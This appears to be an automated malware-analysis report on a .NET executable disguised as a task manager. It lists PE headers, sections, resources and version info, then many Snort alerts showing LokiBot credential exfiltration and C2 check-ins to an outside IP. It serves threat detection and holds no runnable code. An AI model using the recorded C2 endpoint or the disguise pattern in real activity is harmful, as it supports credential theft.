                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8f9ac0x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x11a00.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x8da040x8dc00False0.785647114749data7.61153237798IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x900000x11a000x11a00False0.0666694370567data3.61282474144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xa20000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x901000x10828dBase III DBT, version number 0, next free block index 40
                                            RT_GROUP_ICON0xa09380x14data
                                            RT_VERSION0xa095c0x36cdata
                                            RT_MANIFEST0xa0cd80xd17XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2015
                                            Assembly Version4.0.2.0
                                            InternalNameSoapServices.exe
                                            FileVersion4.1.0.0
                                            CompanyName
                                            LegalTrademarks
                                            CommentsExternal Task Manager
                                            ProductNameTaskManager
                                            ProductVersion4.1.0.0
                                            FileDescriptionTino's TaskManager
                                            OriginalFilenameSoapServices.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            04/29/21-09:18:44.502476TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972180192.168.2.335.247.234.230
                                            04/29/21-09:18:44.502476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.335.247.234.230
                                            04/29/21-09:18:44.502476TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.335.247.234.230
                                            04/29/21-09:18:44.502476TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24972180192.168.2.335.247.234.230
                                            04/29/21-09:18:44.502476TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972180192.168.2.335.247.234.230
                                            04/29/21-09:18:45.816121TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972380192.168.2.335.247.234.230
                                            04/29/21-09:18:45.816121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.335.247.234.230
                                            04/29/21-09:18:45.816121TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.335.247.234.230
                                            04/29/21-09:18:45.816121TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24972380192.168.2.335.247.234.230
                                            04/29/21-09:18:45.816121TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972380192.168.2.335.247.234.230
                                            04/29/21-09:18:46.975892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.335.247.234.230
                                            04/29/21-09:18:46.975892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.335.247.234.230
                                            04/29/21-09:18:46.975892TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.335.247.234.230
                                            04/29/21-09:18:46.975892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.335.247.234.230
                                            04/29/21-09:18:46.975892TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972580192.168.2.335.247.234.230
                                            04/29/21-09:18:48.534119TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.335.247.234.230
                                            04/29/21-09:18:48.534119TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.335.247.234.230
                                            04/29/21-09:18:48.534119TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.335.247.234.230
                                            04/29/21-09:18:48.534119TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.335.247.234.230
                                            04/29/21-09:18:48.534119TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972680192.168.2.335.247.234.230
                                            04/29/21-09:18:49.841095TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.335.247.234.230
                                            04/29/21-09:18:49.841095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.335.247.234.230
                                            04/29/21-09:18:49.841095TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.335.247.234.230
                                            04/29/21-09:18:49.841095TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.335.247.234.230
                                            04/29/21-09:18:49.841095TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972780192.168.2.335.247.234.230
                                            04/29/21-09:18:51.066016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.335.247.234.230
                                            04/29/21-09:18:51.066016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.335.247.234.230
                                            04/29/21-09:18:51.066016TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.335.247.234.230
                                            04/29/21-09:18:51.066016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.335.247.234.230
                                            04/29/21-09:18:51.066016TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973080192.168.2.335.247.234.230
                                            04/29/21-09:18:52.333278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.335.247.234.230
                                            04/29/21-09:18:52.333278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.335.247.234.230
                                            04/29/21-09:18:52.333278TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.335.247.234.230
                                            04/29/21-09:18:52.333278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.335.247.234.230
                                            04/29/21-09:18:52.333278TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973180192.168.2.335.247.234.230
                                            04/29/21-09:18:53.571368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.335.247.234.230
                                            04/29/21-09:18:53.571368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.335.247.234.230
                                            04/29/21-09:18:53.571368TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.335.247.234.230
                                            04/29/21-09:18:53.571368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.335.247.234.230
                                            04/29/21-09:18:53.571368TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973380192.168.2.335.247.234.230
                                            04/29/21-09:18:55.018479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.335.247.234.230
                                            04/29/21-09:18:55.018479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.335.247.234.230
                                            04/29/21-09:18:55.018479TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.335.247.234.230
                                            04/29/21-09:18:55.018479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.335.247.234.230
                                            04/29/21-09:18:55.018479TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973480192.168.2.335.247.234.230
                                            04/29/21-09:18:56.255489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.335.247.234.230
                                            04/29/21-09:18:56.255489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.335.247.234.230
                                            04/29/21-09:18:56.255489TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.335.247.234.230
                                            04/29/21-09:18:56.255489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.335.247.234.230
                                            04/29/21-09:18:56.255489TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973880192.168.2.335.247.234.230
                                            04/29/21-09:18:57.489684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.335.247.234.230
                                            04/29/21-09:18:57.489684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.335.247.234.230
                                            04/29/21-09:18:57.489684TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.335.247.234.230
                                            04/29/21-09:18:57.489684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.335.247.234.230
                                            04/29/21-09:18:57.489684TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973980192.168.2.335.247.234.230
                                            04/29/21-09:18:58.739296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.335.247.234.230
                                            04/29/21-09:18:58.739296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.335.247.234.230
                                            04/29/21-09:18:58.739296TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.335.247.234.230
                                            04/29/21-09:18:58.739296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.335.247.234.230
                                            04/29/21-09:18:58.739296TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974080192.168.2.335.247.234.230
                                            04/29/21-09:19:00.024705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.335.247.234.230
                                            04/29/21-09:19:00.024705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.335.247.234.230
                                            04/29/21-09:19:00.024705TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.335.247.234.230
                                            04/29/21-09:19:00.024705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.335.247.234.230
                                            04/29/21-09:19:00.024705TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974180192.168.2.335.247.234.230
                                            04/29/21-09:19:01.421406TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.335.247.234.230
                                            04/29/21-09:19:01.421406TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.335.247.234.230
                                            04/29/21-09:19:01.421406TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.335.247.234.230
                                            04/29/21-09:19:01.421406TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.335.247.234.230
                                            04/29/21-09:19:01.421406TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974280192.168.2.335.247.234.230
                                            04/29/21-09:19:03.174503TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.335.247.234.230
                                            04/29/21-09:19:03.174503TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.335.247.234.230
                                            04/29/21-09:19:03.174503TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.335.247.234.230
                                            04/29/21-09:19:03.174503TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.335.247.234.230
                                            04/29/21-09:19:03.174503TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974380192.168.2.335.247.234.230
                                            04/29/21-09:19:04.404732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.335.247.234.230
                                            04/29/21-09:19:04.404732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.335.247.234.230
                                            04/29/21-09:19:04.404732TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.335.247.234.230
                                            04/29/21-09:19:04.404732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.335.247.234.230
                                            04/29/21-09:19:04.404732TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974480192.168.2.335.247.234.230
                                            04/29/21-09:19:05.661257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.335.247.234.230
                                            04/29/21-09:19:05.661257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.335.247.234.230
                                            04/29/21-09:19:05.661257TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.335.247.234.230
                                            04/29/21-09:19:05.661257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.335.247.234.230
                                            04/29/21-09:19:05.661257TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974580192.168.2.335.247.234.230
                                            04/29/21-09:19:07.091418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.335.247.234.230
                                            04/29/21-09:19:07.091418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.335.247.234.230
                                            04/29/21-09:19:07.091418TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.335.247.234.230
                                            04/29/21-09:19:07.091418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.335.247.234.230
                                            04/29/21-09:19:07.091418TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974680192.168.2.335.247.234.230
                                            04/29/21-09:19:08.631182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.335.247.234.230
                                            04/29/21-09:19:08.631182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.335.247.234.230
                                            04/29/21-09:19:08.631182TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.335.247.234.230
                                            04/29/21-09:19:08.631182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.335.247.234.230
                                            04/29/21-09:19:08.631182TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974780192.168.2.335.247.234.230
                                            04/29/21-09:19:09.846278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.335.247.234.230
                                            04/29/21-09:19:09.846278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.335.247.234.230
                                            04/29/21-09:19:09.846278TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.335.247.234.230
                                            04/29/21-09:19:09.846278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.335.247.234.230
                                            04/29/21-09:19:09.846278TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974880192.168.2.335.247.234.230
                                            04/29/21-09:19:11.264756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.335.247.234.230
                                            04/29/21-09:19:11.264756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.335.247.234.230
                                            04/29/21-09:19:11.264756TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.335.247.234.230
                                            04/29/21-09:19:11.264756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.335.247.234.230
                                            04/29/21-09:19:11.264756TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974980192.168.2.335.247.234.230
                                            04/29/21-09:19:12.481082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.335.247.234.230
                                            04/29/21-09:19:12.481082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.335.247.234.230
                                            04/29/21-09:19:12.481082TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.335.247.234.230
                                            04/29/21-09:19:12.481082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.335.247.234.230
                                            04/29/21-09:19:12.481082TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975080192.168.2.335.247.234.230
                                            04/29/21-09:19:13.981783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.335.247.234.230
                                            04/29/21-09:19:13.981783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.335.247.234.230
                                            04/29/21-09:19:13.981783TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.335.247.234.230
                                            04/29/21-09:19:13.981783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.335.247.234.230
                                            04/29/21-09:19:13.981783TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975380192.168.2.335.247.234.230
                                            04/29/21-09:19:15.458383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.335.247.234.230
                                            04/29/21-09:19:15.458383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.335.247.234.230
                                            04/29/21-09:19:15.458383TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.335.247.234.230
                                            04/29/21-09:19:15.458383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.335.247.234.230
                                            04/29/21-09:19:15.458383TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975480192.168.2.335.247.234.230
                                            04/29/21-09:19:17.051023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.335.247.234.230
                                            04/29/21-09:19:17.051023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.335.247.234.230
                                            04/29/21-09:19:17.051023TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.335.247.234.230
                                            04/29/21-09:19:17.051023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.335.247.234.230
                                            04/29/21-09:19:17.051023TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975580192.168.2.335.247.234.230
                                            04/29/21-09:19:18.349585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.335.247.234.230
                                            04/29/21-09:19:18.349585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.335.247.234.230
                                            04/29/21-09:19:18.349585TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.335.247.234.230
                                            04/29/21-09:19:18.349585TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.335.247.234.230
                                            04/29/21-09:19:18.349585TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975680192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975780192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975880192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975980192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976080192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976180192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976280192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976380192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976480192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976580192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976680192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976780192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976980192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977480192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977580192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977680192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.335.247.234.230
